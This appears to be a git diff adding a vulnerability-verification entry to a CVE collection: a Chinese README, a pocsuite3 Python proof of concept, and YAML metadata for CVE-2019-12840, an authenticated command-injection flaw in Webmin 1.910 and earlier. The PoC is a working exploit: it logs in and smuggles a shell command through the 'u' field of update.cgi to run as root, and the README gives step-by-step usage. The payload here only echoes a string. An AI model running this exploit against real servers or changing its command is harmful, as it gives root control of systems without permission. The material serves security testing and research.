diff --git "a/cve/webmin/2019/CVE-2019-12840/POC\346\210\220\345\212\237\345\233\276\347\244\272.png" "b/cve/webmin/2019/CVE-2019-12840/POC\346\210\220\345\212\237\345\233\276\347\244\272.png" new file mode 100644 index 0000000000000000000000000000000000000000..d3fddbb6bf99e979f8ca9d103a74c46cb8d4493a Binary files /dev/null and "b/cve/webmin/2019/CVE-2019-12840/POC\346\210\220\345\212\237\345\233\276\347\244\272.png" differ diff --git a/cve/webmin/2019/CVE-2019-12840/README.md b/cve/webmin/2019/CVE-2019-12840/README.md new file mode 100644 index 0000000000000000000000000000000000000000..c3b773dc6bb4234cf784f61f6a9a2e955fb87fee --- /dev/null +++ b/cve/webmin/2019/CVE-2019-12840/README.md @@ -0,0 +1,44 @@ +# CVE-2019-12840 Webmin认证后RCE + +## 漏洞分析 + +任何通过认证的用户在使用 Package Updates模块时,处理数据时 $cmd 字段被直接拼接到命令上,使其可以通过向后端 update.cgi 传递 post 类型数据来以root权限执行任意命令。 + +## 工具 + +### 语言 + +- Python 3 + +### 第三方库 + +- pocsuite3 + +- Beautifulsoup + +```bash +pip3 install pocsuite +pip3 install bs4 +``` + +## 使用步骤 + +可通过 vulhub 项目部署漏洞环境 docker 服务到本地 192.168.114.148:10000 + +依据现实情况更改 POC 中 user 和 password 字段,使得成功登录。 + +输入命令: + +```bash +pocsuite -r Webmin_package_update_none_0_remote_command_execute_php_poc_cve_2019_12840.py -u https://192.168.114.148:10000 +``` + +POC 中执行回显随机字符串命令: + +```python3 +cmd = "echo jjtsrlbnyyhm" +``` + +出现图示表示漏洞存在: + +![](./POC成功图示.png) diff --git a/cve/webmin/2019/CVE-2019-12840/Webmin_package_update_none_0_remote_command_execute_php_poc_cve_2019_12840.py b/cve/webmin/2019/CVE-2019-12840/Webmin_package_update_none_0_remote_command_execute_php_poc_cve_2019_12840.py new file mode 100644 index 0000000000000000000000000000000000000000..e1479e509711874c4c4d574ff4dc8631ec95de16 --- /dev/null +++ b/cve/webmin/2019/CVE-2019-12840/Webmin_package_update_none_0_remote_command_execute_php_poc_cve_2019_12840.py @@ -0,0 +1,90 @@ +from pocsuite3.api import Output, POCBase, register_poc, requests +from pocsuite3.lib.core.data import logger +from bs4 import BeautifulSoup + +class DemoPOC(POCBase): + vulID = 'CVE-2019-12840' + version = '1.0' + author = ['Picasso'] + vulDate = '2019-06-15' + createDate = '2019-06-15' + updateDate = '2020-08-24' + references = ['https://nvd.nist.gov/vuln/detail/CVE-2019-12840'] + name = '认证 Webmin 包更新远程命令执行漏洞' + appPowerLink = '' + appName = 'Webmin' + appVersion = '1.910' + vulType = 'PACKAGE UPDATE REMOTE COMMAND EXECUTE' + desc = '''Webmin 1.910以及之前版本,任何认证后的用户通过"Package Updates"模块可以以root权限执行任意命令. ''' + + def _login(self): + logger.info("logging in ...") + session = requests.Session() + session.cookies["testing"] = "1" + data = {'page': '', 'user': "root", 'pass': "admin"} + loginurl = self.url + "/session_login.cgi" + try: + res = session.post(loginurl, data=data, verify=False, allow_redirects=False) + if res.status_code == 302 and session.cookies["sid"] != None: + return session.cookies["sid"] + except: + logger.warn("Failed to login!!") + return "Failed" + + def _check(self,sid): + cmd = "echo jjtsrlbnyyhm" + logger.info("Sending command ...") + session = requests.Session() + referer = self.url + "/package-updates/update.cgi?xnavigation=1" + cookies = "Cookie: redirect=1; testing=1;sid=" + sid + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0", + "Connection": "close", + "Content-Type": "application/x-www-form-urlencoded", + "Referer": referer, + "X-Progressive-URL": self.url + "package-updates/update.cgi", + "X-Requested-From": "package-updates", + "X-Requested-From-Tab": "webmin", + "X-Requested-With": "XMLHttpRequest", + "Cookie": cookies + } + data = "mode=updates&search=&u=apt/apt&u=;" + cmd + ";/apt&ok_top=Update+Selected+Packages" + updateurl = self.url + "/package-updates/update.cgi" + try: + res = session.post(updateurl, data=data, headers=headers, verify=False) + if res.status_code == 200 and "jjtsrlbnyyhm" in res.text: + soup = BeautifulSoup(res.text, 'html.parser') + output = soup.find_all('pre') + return output + except Exception as e: + logger.warn(str(e)) + return False + + def _verify(self): + result = {} + sid = self._login() + if sid != "Failed": + sid = sid.strip() + else: + return self.parse_output(result) + + p = self._check(sid) + if p: + content = p + result['FileInfo'] = {} + result['FileInfo']['Filename'] = "Feedback" + result['FileInfo']['Content'] = content + return self.parse_output(result) + + def _attack(self): + return self._verify() + + def parse_output(self, result): + output = Output(self) + if result: + output.success(result) + else: + output.fail('target is not vulnerable') + return output + +register_poc(DemoPOC) diff --git a/cve/webmin/2019/yaml/CVE-2019-12840.yaml b/cve/webmin/2019/yaml/CVE-2019-12840.yaml new file mode 100644 index 0000000000000000000000000000000000000000..1112f170b607c15cf3044a62ddd9e8e4d7085ea3 --- /dev/null +++ b/cve/webmin/2019/yaml/CVE-2019-12840.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-12840 +source: None +info: + name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。 + severity: High + description: | + Webmin 1.910以及之前版本,任何认证后的用户通过"Package Updates"模块可以以root权限执行任意命令. + scope-of-influence: + Webmin <= 1.910 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-12840 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-12840 + cwe-id: CWE-78 + cnvd-id: CNVD-2019-19305 + kve-id: None + tags: cve2019, rce \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 9fdf2623ad2b75e42ebfe295c9b979dea2af2983..16420afa62de66a6e7aa5a762ea4c0ed3b069038 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -168,6 +168,7 @@ cve: - CVE-2022-22963 - CVE-2022-31692 webmin: + - CVE-2019-12840 - CVE-2022-0824 - CVE-2022-36446 Zimbra: